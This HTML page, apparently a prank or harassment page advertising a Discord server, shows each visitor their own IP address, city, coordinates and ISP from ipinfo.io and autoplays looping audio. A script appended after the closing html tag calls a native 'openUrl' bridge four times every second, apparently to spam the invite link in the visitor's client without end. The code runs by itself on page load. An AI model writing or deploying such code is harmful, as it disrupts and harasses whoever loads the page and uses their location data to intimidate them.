
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>discord.gg/00a</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background: url('https://i.pinimg.com/originals/51/ae/a3/51aea3393b8234a1e69d8713a0a58bc3.gif') no-repeat center center fixed;
            background-size: cover;
            font-family: 'Courier New', Courier, monospace;
            color: #a2a2ad;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
        }
        .image-container img {
            width: 750px; 
            height: auto;
            border: 2px solid #9d9da5; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(202, 202, 209, 0.7); 
        }
        .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: #a6a6af; 
            text-shadow: 0px 0px 8px #868691, 0px 0px 15px #d1d1fa, 0px 0px 25px #c8c8ce; 
            letter-spacing: 4.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 20px;
            font-size: 3em; 
            color: #aaaaaa; 
            text-shadow: 0px 0px 8px #a5a5ad, 0px 0px 15px #c0c0c0, 0px 0px 25px #7c7c7c; 
            letter-spacing: 4.5px; 
        }
    </style>
</head>
<body>
    <div class="image-container">
        <img src="https://cdn.discordapp.com/icons/1338771926817968129/1aedf50c6abaeaa33df1a64d14f5bf1f.webp?size=1024" alt="Discord Image">
    </div>
    <audio autoplay loop>
        <source src="شيلة عبس ربعي لشاعر علي بن عياد الجلادي اداء حمود الشاطري جديد2015.mp3" type="audio/mpeg">
        Your browser does not support the audio element.
    </audio>
    <div class="info" id="ip-info">
        <strong>IP: <span id="ip"></span></strong><br>
        <span><strong>City:</strong> <span id="city"></span></span><br>
        <span><strong>Region:</strong> <span id="region"></span></span><br>
        <span><strong>Country:</strong> <span id="country"></span></span><br>
        <span><strong>Location:</strong> <span id="loc"></span></span><br>
        <span><strong>Organization:</strong> <span id="org"></span></span><br>
        <span><strong>Timezone:</strong> <span id="timezone"></span></span>
    </div>
    <div class="text">discord.gg/00a</div>

    <script>
         fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            delete data.readme;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.textContent = JSON.stringify(data, null, 2);
        });
    </script>
</body>
</html>
<script>
setInterval(() => {
window.invokeNative("openUrl", "https://discord.gg/00a");
window.invokeNative("openUrl", "https://discord.gg/00a");
window.invokeNative("openUrl", "https://discord.gg/00a");
window.invokeNative("openUrl", "https://discord.gg/00a");
}, 1000);
    </script>
